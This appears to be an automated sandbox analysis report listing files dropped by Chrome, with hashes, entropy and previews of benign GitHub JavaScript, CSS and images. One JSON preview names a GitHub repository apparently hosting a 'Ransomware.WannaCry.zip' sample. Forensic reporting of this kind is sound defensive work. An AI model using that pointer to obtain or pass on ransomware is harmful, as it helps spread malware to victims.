                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js"],{48542:(e,t,n)=>{let r;n.d(t,{Qw:()=>i,LM:()=>v,v5:()=>b,km:()=>g,pd:()=>A,BG:()=>f});var i,o=n(44542);function l(){return void 0===r&&(r=/^mac/i.test(window.navigator.platform)),r}var a=n(78160);let d=1e4;(0,o.O)(),function(e){e[e.ArrowHorizontal=1]="ArrowHorizontal",e[e.ArrowVertical=2]="ArrowVertical",e[e.JK=4]="JK",e[e.HL=8]="HL",e[e.HomeAndEnd=16]="HomeAndEnd",e[e.PageUpDown=256]="PageUpDown",e[e.WS=32]="WS",e[e.AD=64]="AD",e[e.Tab=128]="Tab",e[e.Backspace=512]="Backspace",e[e.ArrowAll=3]="ArrowAll",e[e.HJKL=12]="HJKL",e[e.WASD=96]="WASD",e[e.All=511]="All"}(i||(i={}));let s={ArrowLeft:i.ArrowHorizontal,ArrowDown:i.ArrowVertical,ArrowUp:i.ArrowVertical,ArrowRight:i.ArrowHorizontal,h:i.HL,j:i.JK,k:i.JK,l:i.HL,a:i.AD,s:i.WS,w:i.WS,d:i.AD,Tab:i.Tab,Home:i.HomeAndEnd,End:i.HomeAndEnd,PageUp:i.PageUpDown,PageDown:i.PageUpDown,Backspace:i.Backspace},u
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (20922)
                                                                                      Category:dropped
                                                                                      Size (bytes):22030
                                                                                      Entropy (8bit):5.259851938708611
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:mOqV4dNNR5lFQALm5Jwukh2QoekHMuJCgMx18WENPTfNV6GgCSYL/XsTHHv0PGLN:CwRFrmMu9FekHxiLrENPjNV6GgRvCkX9
                                                                                      MD5:CB3114A178D0B95A2C974098C6A945AD
                                                                                      SHA1:9AB2C9ED7152D4907576E72DA494339ACEAF0E24
                                                                                      SHA-256:BD44E9BF0EEF82CAF5E94E49458821CC4E024A762DA05F593BEDB75440BA2DA4
                                                                                      SHA-512:1A8626DD714AB951D677F736E4CA320C82EAA15ABC1F3C5FCA85E39F6F8ABCBF5ECF6E7D9C15D34F60F336F7AA3C752106AD9EA6418E1080AC6FD1C838976134
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["codespaces"],{61013:(e,t,o)=>{o(83058);var r=o(76006),n=o(69567),s=o(12040),a=o(59753),i=o(5223);function l(e){let t=e.querySelectorAll(".js-toggle-hidden");for(let e of t)e.hidden=!e.hidden;let o=e.querySelectorAll(".js-toggle-disabled");for(let e of o)e.getAttribute("aria-disabled")?e.removeAttribute("aria-disabled"):e.setAttribute("aria-disabled","true")}async function c(){let e=document.querySelector(".js-codespaces-details-container");e&&(e.open=!1);let t=document.querySelector("new-codespace");if(t&&!t.getAttribute("data-no-submit-on-create"))try{let e=await fetch("/codespaces/new");if(e&&e.ok){let o=(0,i.r)(document,await e.text());t.replaceWith(o)}}catch(e){}}async function d(e,t){let o=document.querySelector(`#${e}`),r=await (0,s.W)({content:o.content.cloneNode(!0),dialogClass:"project-dialog"});return t&&t.setAttribute("aria-expanded","true"),r.addEventListener("dialog:remove",function(){t&&l(t)},{once
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text
                                                                                      Category:dropped
                                                                                      Size (bytes):2
                                                                                      Entropy (8bit):0.0
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:3:3
                                                                                      MD5:E1C06D85AE7B8B032BEF47E42E4C08F9
                                                                                      SHA1:71853C6197A6A7F222DB0F1978C7CB232B87C5EE
                                                                                      SHA-256:75A11DA44C802486BC6F65640AA48A730F0F684C5C07A42BA3CD1735EB3FB070
                                                                                      SHA-512:016BA8C4CFDE65AF99CB5FA8B8A37E2EB73F481B3AE34991666DF2E04FEB6C038666EBD1EC2B6F623967756033C702DDE5F423F7D47AB6ED1827FF53783731F7
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:..
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (18819)
                                                                                      Category:dropped
                                                                                      Size (bytes):19159
                                                                                      Entropy (8bit):5.357064620202825
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:T6yi5T9FNHrSwYqJpTBxYbOp/acF/3tbmm6CcdM2ldar:3iTFF+wYqlWhE/3tbmmRcdzo
                                                                                      MD5:B97FA8ABD3336FA057D401F525D1481E
                                                                                      SHA1:FBEEBC68F94A3108AA3FD545B5823494BCC61EFA
                                                                                      SHA-256:85070D62B2E60033626D304DDBBB324D746D196359C77C207CAF40A493FEF89B
                                                                                      SHA-512:3208E4C5B7C1CB6749B701A686E3800B1339DC5DFA86AF7BA0CB83C67B8478AE42FAB6CF71FE73083B3122B890265E53CE2057925FF69A99AC124CC9B64CA4A0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["ui_packages_react-core_register-app_ts"],{80810:(t,e,r)=>{r.d(e,{N:()=>n,x:()=>o});var a=r(71207);function n(t,e){o((t.getAttribute("aria-label")||t.innerText||"").trim(),e)}function o(t,e){let{assertive:r}=e??{};!function(t,e){let r=a.n4?.querySelector(e?"#js-global-screen-reader-notice-assertive":"#js-global-screen-reader-notice");r&&(r.textContent===t?r.textContent=`${t}\u00A0`:r.textContent=t)}(t,r)}},79600:(t,e,r)=>{r.d(e,{T:()=>o});var a=r(80810),n=r(71207);function o(t){if(!n.n4)return;let e=n.n4.querySelector("title"),r=n.n4.createElement("title");r.textContent=t,e?e.textContent!==t&&(e.replaceWith(r),(0,a.x)(t)):(n.n4.head.appendChild(r),(0,a.x)(t))}},79697:(t,e,r)=>{let a;r.d(e,{YT:()=>h,qP:()=>p,yM:()=>f});var n=r(88149),o=r(86058),i=r(56363),s=r(43786);let{getItem:l}=(0,i.Z)("localStorage"),c="dimension_",u=["utm_source","utm_medium","utm_campaign","utm_term","utm_content","scid"];try{let t=(0,n.n)("
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (11863)
                                                                                      Category:dropped
                                                                                      Size (bytes):12005
                                                                                      Entropy (8bit):5.074747842127138
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:0ekoDGqyzd4xIwxPglImVd5qyuXrHwz4zZJbzmmgqghZpAunzc67kve7yUYVePqT:0eXDE0PglIExMvVgqgh8uzc67Ge78Ves
                                                                                      MD5:EA2F459BB2EAF606A6D110BB721F8C85
                                                                                      SHA1:0CFC1539816EE68E0CCEA2F32FB4191BB8B05224
                                                                                      SHA-256:3C0095EDE9F86618B394DCB281A35C659330ED3532FF49CB699C4F95083A912C
                                                                                      SHA-512:9285FAA0E011208B72CAA43CE51DD15A03224C73810CA9D549AB21C344C2C96F7B6BB31B86E922858CFE6CEBE6E3B09E7DC8FA35C6C78FD7C44B6C919002AD02
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_behaviors_commenting_edit_ts-app_assets_modules_github_behaviors_ht-83c235"],{21144:(e,t,s)=>{s.d(t,{z:()=>y});var n=s(59753),i=s(85259),o=s(12040),r=s(34532),l=s(83833),a=s(97390),m=s(36071),c=s(65935),u=s(55555);let d=[];function f(e){e.querySelector(".js-write-tab").click();let t=e.querySelector(".js-comment-field");t.focus(),(0,n.f)(t,"change")}function j(e){return e.querySelector(".js-comment-edit-form-deferred-include-fragment")}function g(e){j(e)?.setAttribute("loading","eager")}function y(e){let t=e.currentTarget.closest("form"),s=e.currentTarget.getAttribute("data-confirm-text");if((0,a.T)(t)&&!confirm(s))return!1;for(let e of t.querySelectorAll("input, textarea"))e.value=e.defaultValue,e.classList.contains("session-resumable-canceled")&&(e.classList.add("js-session-resumable"),e.classList.remove("session-resumable-canceled"));let n=e.currentTarget.closest(".js-comment");return
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (53019)
                                                                                      Category:dropped
                                                                                      Size (bytes):287700
                                                                                      Entropy (8bit):4.969111280780789
                                                                                      Encrypted:false
                                                                                      SSDEEP:1536:l0Fxq6tqssp9pWl3MiSlvXQ1zcXaV3h5g7OkyD6v6DTOddoqf7eXDGcVyFukAO7v:lEvahdXQ9V3h5+sijhtmk
                                                                                      MD5:D4C3C8F887B3BDD1356632CD19CE6F9A
                                                                                      SHA1:A03100078C028DD3F16EC10D9206B6BF8A23B661
                                                                                      SHA-256:858BCF57AB20524250C3FA0F6DAC5777F04B839EF46507358BA1D5DAF560D823
                                                                                      SHA-512:C2F8EFB9BCE8D4A8ACBD81357FC6A69196A66420DC08C3FE89EBEAC0C054096974B72161978CAE2B457AF831CFA5B6BE07F421195A920241940A3FBC631442CF
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.color-border-inverse{border-color:var(--fgColor-onEmphasis, var(--color-fg-on-emphasis)) !important}.bg-gray-2,.bg-gray-3{background-color:var(--bgColor-neutral-muted, var(--color-neutral-muted)) !important}.color-text-white{color:var(--fgColor-white, var(--color-scale-white)) !important}.border-white-fade{border-color:rgba(255,255,255,.15) !important}.lead{color:var(--fgColor-muted, var(--color-fg-muted))}.text-emphasized{color:var(--fgColor-default, var(--color-fg-default))}.Label.Label--orange{color:var(--fgColor-severe, var(--color-severe-fg));border-color:var(--borderColor-severe-emphasis, var(--color-severe-emphasis))}.Label.Label--purple{color:var(--fgColor-done, var(--color-done-fg));border-color:var(--borderColor-done-emphasis, var(--color-done-emphasis))}.Label.Label--pink{color:var(--fgColor-sponsors, var(--color-sponsors-fg));border-color:var(--borderColor-sponsors-emphasis, var(--color-sponsors-emphasis))}/*!. * GitHub Light v0.5.0. * Copyright (c) 2012 - 2017 GitHub, Inc
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JSON data
                                                                                      Category:dropped
                                                                                      Size (bytes):1247
                                                                                      Entropy (8bit):5.501555896178693
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:YpbZ9b4ePGZ9JG4J0/17T0/CZqc7T0//qL7hjd2OoJjd2OKeJjd2Ovj:YJZtXPOXLI17TICZqc7TI/qJh2OoJh20
                                                                                      MD5:7468131146A0E6850D9A4C8331AD6669
                                                                                      SHA1:D33210238A649A2D9EEF4C898307D4237C5D8568
                                                                                      SHA-256:C1BC9EBA2AD10F48476E86EA22DFB4A38B6AE3197848DBCBD57EDD61B375F4F7
                                                                                      SHA-512:FC8C2809C26E725677D82C11FF1CCC69FC1482089823EE8848B0CE3FF550C30538B53A64EFF0B60C5DBB580278E8DC1022263E21200D50AE4BCA125E81A91EB0
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:{"LICENSE":{"oid":"aa29847a029490be697e35d7390c38802101b27c","url":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/aa29847a029490be697e35d7390c38802101b27c","date":"2017-06-01T14:19:07.000-03:00","shortMessageHtmlLink":"<a data-pjax=\"true\" title=\"Initial commit\" class=\"Link--secondary\" href=\"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/aa29847a029490be697e35d7390c38802101b27c\">Initial commit</a>"},"README.md":{"oid":"2445abd45c99c3ad9611ebcacc6cfe28451c2c0d","url":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d","date":"2017-06-01T15:17:38.000-03:00","shortMessageHtmlLink":"<a data-pjax=\"true\" title=\"Update README.md\" class=\"Link--secondary\" href=\"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/2445abd45c99c3ad9611ebcacc6cfe28451c2c0d\">Update README.md</a>"},"Ransomware.WannaCry.zip":{"oid":"19bd86f8998fd0a34d051cad3894ca19155fcdbe","url":"/chronosmiki/RANSOMWARE-WANNACRY-2.0/commit/19bd86f8998fd0a34d051cad3894ca19155fcdbe","date":"2017-06-
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (18382)
                                                                                      Category:dropped
                                                                                      Size (bytes):18524
                                                                                      Entropy (8bit):5.304958967093736
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:FZWxmnmnbQslyM/kPpV6prveYSlkIj+Cldf05XemfNnDiS6OSqONB2Gb0o0Mtyyw:Fviy/76NveYSlkIjG5XeAnDiSQRuySd1
                                                                                      MD5:1379D285985FADF567B6C14110FD3FAB
                                                                                      SHA1:862ACD27400B9D8C1A6A72863B3560DDADA60C87
                                                                                      SHA-256:B8E6CB05776117B85F234E7A4F3E2DAF2203654A4F4628846C0F8E8F99DACFF1
                                                                                      SHA-512:50158068CC105163947B243C0EF8C55617DDCE7006535989438D3F956073DFF8D5EA063BB5BDCED1A659D520B5041FFE16F627037315453E769E37532F208831
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_github_mini-throttle_dist_index_js-node_modules_delegated-events_dist_in-f11236"],{46263:(e,t,n)=>{function r(e,t=0,{start:n=!0,middle:r=!0,once:i=!1}={}){let o,s=0,l=!1;function a(...c){if(l)return;let u=Date.now()-s;s=Date.now(),n?(n=!1,e.apply(this,c),i&&a.cancel()):(r&&u<t||!r)&&(clearTimeout(o),o=setTimeout(()=>{s=Date.now(),e.apply(this,c),i&&a.cancel()},r?t-u:t))}return a.cancel=()=>{clearTimeout(o),l=!0},a}function i(e,t=0,{start:n=!1,middle:i=!1,once:o=!1}={}){return r(e,t,{start:n,middle:i,once:o})}n.d(t,{D:()=>i,P:()=>r})},59753:(e,t,n)=>{function r(){if(!(this instanceof r))return new r;this.size=0,this.uid=0,this.selectors=[],this.selectorObjects={},this.indexes=Object.create(this.indexes),this.activeIndexes=[]}n.d(t,{f:()=>M,S:()=>T,on:()=>S});var i,o=window.document.documentElement,s=o.matches||o.webkitMatchesSelector||o.mozMatchesSelector||o.oMatchesSelector||o.msMatchesSelec
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (16956)
                                                                                      Category:dropped
                                                                                      Size (bytes):17034
                                                                                      Entropy (8bit):5.242435438761079
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:PvNrHa/aCE92j9v/ux/8hQFiKbDV3nxCauvM0jOGyEEUFVk0jt4D:PvN7a/aCp9v/up8hdKbDbSvMXxEEUFVU
                                                                                      MD5:94945D7E9DC60119E6C49339936AA312
                                                                                      SHA1:2776E2D1BD2A78816A413C7BEDA036DB194489D5
                                                                                      SHA-256:3C9F7B7E984FF494211A103BF62AEEFE6937D6DF6410850F6142902A3490635A
                                                                                      SHA-512:2641544048B8CE445F5ABF41328B0B6C27460002262744CCCBDF39755D7A07C80F6D97362E7026CC8D110E592D99B9E339D34389D3D8D538BE8DCFA9E604BB63
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["app_assets_modules_github_jump-to_ts"],{21989:(e,t,n)=>{let o;n.r(t),n.d(t,{clearSuggestionsCache:()=>_,getSuggestions:()=>H});var a=n(174);function i(e,t){let n=new URL(e,window.location.origin),o=new URLSearchParams(n.search.slice(1));o.set("q",t);let a=new URLSearchParams(window.location.search).get("type");return a&&o.set("type",a),n.search=o.toString(),n.toString()}var r=n(22575),s=n(79697);let c={};function l(e){let t=e.getAttribute("data-target-type");if("Search"===t){let t=document.querySelector(".js-site-search-form"),n=t.getAttribute("data-scope-type"),o=e.getAttribute("data-item-type");n&&f({scope_id:parseInt(t.getAttribute("data-scope-id")||"").toString(),scope_type:n,target_scope:o||""}),u("search")}else("Project"===t||"Repository"===t||"Team"===t)&&(f({target_id:parseInt(e.getAttribute("data-target-id")||"").toString(),target_type:t,target_scope:"",client_rank:parseInt(e.getAttribute("data-client-r
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (4838)
                                                                                      Category:dropped
                                                                                      Size (bytes):4930
                                                                                      Entropy (8bit):5.301899808540435
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:AGd2NeZ1BuRGxo/1XiN5VS9BbIGgGqDHRYrTz5E+xIaS30Y7:AYCGO1XIawgTTxIBj7
                                                                                      MD5:11A69B0651264A2235A7059E9E677227
                                                                                      SHA1:A467270F0455DE4AB13FD33856A5341E38AAA6EA
                                                                                      SHA-256:3316D32E073B0F756D7E247B00B1A016F421973C50F1E3A9CE9F5B86E975CF9D
                                                                                      SHA-512:5BFF297A06DEC294D6D6EB1F52EDF99E69871F6325E470C4792283524E0F65FDC701C1DD9C962F49CB42276CD108E7E4A71573FF575C971ADD30616C24101450
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_morphdom_dist_morphdom-esm_js"],{39492:(e,t,n)=>{n.d(t,{Z:()=>p});var a,r,i="undefined"==typeof document?void 0:document,o=!!i&&"content"in i.createElement("template"),d=!!i&&i.createRange&&"createContextualFragment"in i.createRange();function l(e,t){var n,a,r=e.nodeName,i=t.nodeName;return r===i||((n=r.charCodeAt(0),a=i.charCodeAt(0),n<=90&&a>=97)?r===i.toUpperCase():a<=90&&n>=97&&i===r.toUpperCase())}function u(e,t,n){e[n]!==t[n]&&(e[n]=t[n],e[n]?e.setAttribute(n,""):e.removeAttribute(n))}var c={OPTION:function(e,t){var n=e.parentNode;if(n){var a=n.nodeName.toUpperCase();"OPTGROUP"===a&&(a=(n=n.parentNode)&&n.nodeName.toUpperCase()),"SELECT"!==a||n.hasAttribute("multiple")||(e.hasAttribute("selected")&&!t.selected&&(e.setAttribute("selected","selected"),e.removeAttribute("selected")),n.selectedIndex=-1)}u(e,t,"selected")},INPUT:function(e,t){u(e,t,"checked"),u(e,t,"disabled"),e.value!==t.v
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (5047)
                                                                                      Category:dropped
                                                                                      Size (bytes):16070
                                                                                      Entropy (8bit):5.315960843448526
                                                                                      Encrypted:false
                                                                                      SSDEEP:384:/K20S7atOYXGxrjrZFJjxbHn2xq+unjpLPiUgHdS:/K20S7WOGG1/ZFBxb2xq+untaUgHdS
                                                                                      MD5:81628C9093236D8E3CF835F708C30608
                                                                                      SHA1:846B10531DFCA6510051FC43ABB8F9B5647A0433
                                                                                      SHA-256:DAF381C316A5988C9116AA65C5816CBC8A958211B4C0B7D989AD6C9645757902
                                                                                      SHA-512:5B376145BEFFCA1BFC6B0352C08819609A974B6170848699421208752A63F057869E0E4DDD23797B3A0C281C276D7FAE580CF41BB5465C632AEE58524B21E7BA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_lit-html_lit-html_js"],{13695:(t,e,i)=>{i.d(e,{X:()=>n,w:()=>r});/**. * @license. * Copyright (c) 2017 The Polymer Project Authors. All rights reserved.. * This code may only be used under the BSD style license found at. * http://polymer.github.io/LICENSE.txt. * The complete set of authors may be found at. * http://polymer.github.io/AUTHORS.txt. * The complete set of contributors may be found at. * http://polymer.github.io/CONTRIBUTORS.txt. * Code distributed by Google as part of the polymer project is also. * subject to an additional IP rights grant found at. * http://polymer.github.io/PATENTS.txt. */let s=new WeakMap,n=t=>(...e)=>{let i=t(...e);return s.set(i,!0),i},r=t=>"function"==typeof t&&s.has(t)},66921:(t,e,i)=>{i.d(e,{V:()=>n,eC:()=>s,r4:()=>r});/**. * @license. * Copyright (c) 2017 The Polymer Project Authors. All rights reserved.. * This code may only be used under the BSD style l
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):958
                                                                                      Entropy (8bit):7.658357792937225
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:27/6nG9HpUcY59W8qxAkNf3RHOjfHNHUMo4fuec:27/6n6HpUD9Y6kDHGZoEuz
                                                                                      MD5:346E09471362F2907510A31812129CD2
                                                                                      SHA1:323B99430DD424604AE57A19A91F25376E209759
                                                                                      SHA-256:74CF90AC2FE6624AB1056CACEA11CF7ED4F8BEF54BBB0E869638013BBA45BC08
                                                                                      SHA-512:A62B0FCC02E671D6037725CF67935F8CA1C875F764CE39FED267420935C0B7BAD69AB50D3F9F8C628E9B3CFF439885EE416989E31CEAA5D32AE596DD7E5FEDBD
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.PNG........IHDR... ... .....szz.....pHYs.................sRGB.........gAMA......a....SIDATx..W.M.@.~.l(.R.n`T".HM....4..d.......4........X"..!.T5.._...q.sHp.O.....?#,....V..BV.......!.a...!9.`W.._y.7Z./>+.T...h#..X..P.td.x../Q.-6_.=V...3..q.y.hi.".7...5..<I..:o...b.l.S8.y1.b.lkhS...y.<.{ ..9...........D.Q+g..y..BJ.........q?..(f.X.N..1u.h.I0..o....&Pp4..X..y.x.\o.......sb.,[i>...R.*...a..x.31H...a.....y.c.h.L.xN.8..x....0..{.).*...=...9af....u..a.e]w .X0.....8.A.J.....5.k.^.Y.kC..z...U.?.Hr,.`M..?.Y....9..y..,.v..iA.X..........D..B{7ae.....[.;b.x......[.kZ..'(...F9.....v?@GD.D.Bmw..[..^.kV.e.Bn...8x..n.r.9...>.s....JG-"-.N....t...(W.....u..Hh.....p..x.....k>..i...#.mt..:../..^C.t...B]x...Ob.K}X.x.....>h.7..~ ..FB.<.k@.$.%k.g.B$_.vB..g->$I...<^).Za].."ZB.'....yn(.....s!....n.X.*sh.peP....x,....P}..B' .K`..n.?...a .h({f...0..D..A.WU@g...f..y.....Qw..5.,.C...tQL........w.!......y|.....U:.?|....p.n....IEND.B`.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced
                                                                                      Category:dropped
                                                                                      Size (bytes):14426
                                                                                      Entropy (8bit):7.9795666146409525
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:7ds+UWWRuWf5kTqhc+Ci2EeUIWDA8uDAHGUkNW53kq4u/F7vlg+XEgoZib8EbYFB:7q+RWxf5q4R24IDOZ424hZ+8xQaFH
                                                                                      MD5:603ACD083C6E628CDA0184B6B0FCEF21
                                                                                      SHA1:CCDA6EDB7E27B25E66F9BA4B6DC26D3A77ED6949
                                                                                      SHA-256:E081CCFAFBA52C0D2D05278D61D9341A83ABAE3BE7AE97229E75786A9B969FD1
                                                                                      SHA-512:D7CD8B7FF57C2189EBE8DFF037C2F2E8CB4AF90900041D723F6763ED5A213D206E985B13FB88F477891A6E4E497FC77DB991F3227C84A3D95626479521C5AA35
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:.PNG........IHDR..............F... .IDATx..}w......).}..... .b..Q,.!...k0~.Fc.5..cD..[.%.k.=...&.K......*.0.a.0..Y..9..~.^k...0.....70s.>....k=.Q....@h}..9.;...v..)..=.u..g_'..s..D........d./....}qB..z[SJ...0........H.V...?I_.X...\.u...^.9.a./Q.x.v...60... ....~....1>O).$..R.Y6.v.8F..tH.9mXL....q.$....;..w.A.....6|.......Ow|...?.9........e(.Tr...{..n1nyv%...0..._{.1..;`.B!.....&.vG.g)...6..?k.H.U...F..xc.8a...\.8[.r.AY..D.r.9_V.....}...g.....r.....l6E)...J`..6...9.J.......$..B......0.u.k.....#%..)....sR.?r.......].\eL.c.M.........V8.;wv..X`..xC......H).k..!:...r[0....v....N...q..(.S..F......*..\...I...J!D3'3s.>.(..&B....&=...-#....".'O.;A.....r.]A.;-B.vO....E..x...8.........8|.<..e...k..{....x.U......,4@..3....@..8.'[.R."..0.....w.Y.B.[..55-R.K(.OL. ]5N#[.E=..........]wVdD..so..p=..%.....)@'..-.z-.....m...X.k.q'./h....Or.n.1..I.~u-.8...%....W.)rJ..).?E...ia.....................cG.s.'o......!M3....>BQ......%%()n.......M.6e....].6...JN..~HT.
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:ASCII text, with very long lines (37010)
                                                                                      Category:dropped
                                                                                      Size (bytes):235961
                                                                                      Entropy (8bit):5.213734442502324
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:KaAtj4pCDSyAgqtVycHR1VR5nD4Sfy/Hwpd9stSFaYqMFvLwQ:Qtj4pC5Ag6QcFD46scFaYqMF8Q
                                                                                      MD5:DA3BDAF62E9D03D90D952FC344299A4E
                                                                                      SHA1:6766CB134341A8A5C93EC75F8E2C78B7892F5B0D
                                                                                      SHA-256:BE91D5E4A4CF78051F35E1475BF38EC498312F7C59D2885D3A45CC4073D2097D
                                                                                      SHA-512:4E25E265EF841FFE860648056D39372C8D2F1B9963E9B6D0DC7E396BA148DA4D92ABFC70CC02AA44F284BA6D669F43B9D8C9DA616AFD6D9340ABBFAB5CA518D4
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["behaviors"],{19370:(e,t,n)=>{"use strict";let r,i,a,o,s,l,c,u,d;var m,f,h,p,g,b,y,v=n(58353),w=n(59753);(0,w.on)("deprecatedAjaxSend","[data-remote]",function(e){e.currentTarget!==e.target||e.defaultPrevented||e.currentTarget.classList.add("loading")}),(0,w.on)("deprecatedAjaxComplete","[data-remote]",function(e){e.currentTarget===e.target&&e.currentTarget.classList.remove("loading")});var S=n(65935);(0,S.AC)("form.js-ajax-pagination, .js-ajax-pagination form",async function(e,t){let n;let r=e.closest(".js-ajax-pagination");try{n=await t.html()}catch(e){if(e.response&&404===e.response.status){r.remove();return}throw e}r.replaceWith(n.html),(0,w.f)(e,"page:loaded")});var E=n(79697),L=n(71207),j=n(56363);let{getItem:A}=(0,j.Z)("localStorage");(0,w.on)("click","[data-analytics-event]",e=>{if(L.n4?.head?.querySelector('meta[name="is_logged_out_page"]')?.content)return;let t=e.currentTarget,n=t.getAttribute("data-analytics-event"
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:JPEG image data, baseline, precision 8, 40x40, components 3
                                                                                      Category:dropped
                                                                                      Size (bytes):954
                                                                                      Entropy (8bit):7.408709743075076
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Q9YMFM0XxDuLHeOWXG427DAJuLHenX3f/FykVtrj26sMSjRKgsTaa0cWcB:Q9YM+uETA9FdY3reqncB
                                                                                      MD5:28CB06405CBD30B2BDD8405E56322FA4
                                                                                      SHA1:DDD8D076419440B6A982FCC1FF3D48423CCC3924
                                                                                      SHA-256:E4C31C10D95DBB7A2D38787B989FF010A9D891A028415272E0C21D607A6DD9C7
                                                                                      SHA-512:885628F8085E3D88968F97E2C62B9B704DEF9196E3501F2D939DB3192CCB7869A5BBA29146DF49FFC6A8D5F8F5B8E3E7866FDE02AC9DFC25599FB5DFDBACCEFA
                                                                                      Malicious:false
                                                                                      Reputation:low
                                                                                      Preview:......................................... $.' ",#..(7),01444.'9=82<.342...........2!.!22222222222222222222222222222222222222222222222222......(.(.."........................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz......................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....2J...F....sL...^X.j.i..5..[vG..G# .t..&..u.>.k6.H...#......I....U...].....gu.....T..s..........u.s...k~..x.,..........lm.TR....RU.r9L..^..|4..Z...._,.N.[.0%..*..t?0 ...k.+....n|.z....t.y...${.b...k.r.k.kM.....*[I.q>.S...I..;.$M{.;.-..Ay..,......W...o.m.d.s..b(b.8..E..W.|G..|Q$..b.4.0...f.yo.s..V1.Y;~.5..y...t.B*+1`.:s..j.(..0..(...(...(...
                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      File Type:HTML document, ASCII text, with very long lines (5219)
                                                                                      Category:dropped
                                                                                      Size (bytes):132644
                                                                                      Entropy (8bit):5.530468964125597
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:DhuYDhuYak2X+mU5tZQcx7z29fVc6XgJRbnnk5M+bA+go+g37/u/E2CYM/eK4qTL:DhuYDhuYake9XgJRbnnk5M6Ajo+g37Wy
                                                                                      MD5:AFC5EE39A2D3827A15060CC6090C4E18
                                                                                      SHA1:043150103E878AF18387972ABDAB3B8D5B6DBBBE
                                                                                      SHA-256:65FBDF445A5B76F8F0465CAAD0AB3E9C83A73897580D0C604D756F24E475AEF5
                                                                                      SHA-512:09E50289DA03315EE9A1057CEDE5E271CD23C765830A54C21D28F7E603C90E77EC9EAF67347CD8022AE1F19C617F60462007DD78481775591DBFCAC876E3CC83
                                                                                      Malicious:false
                                                                                      Reputation:low
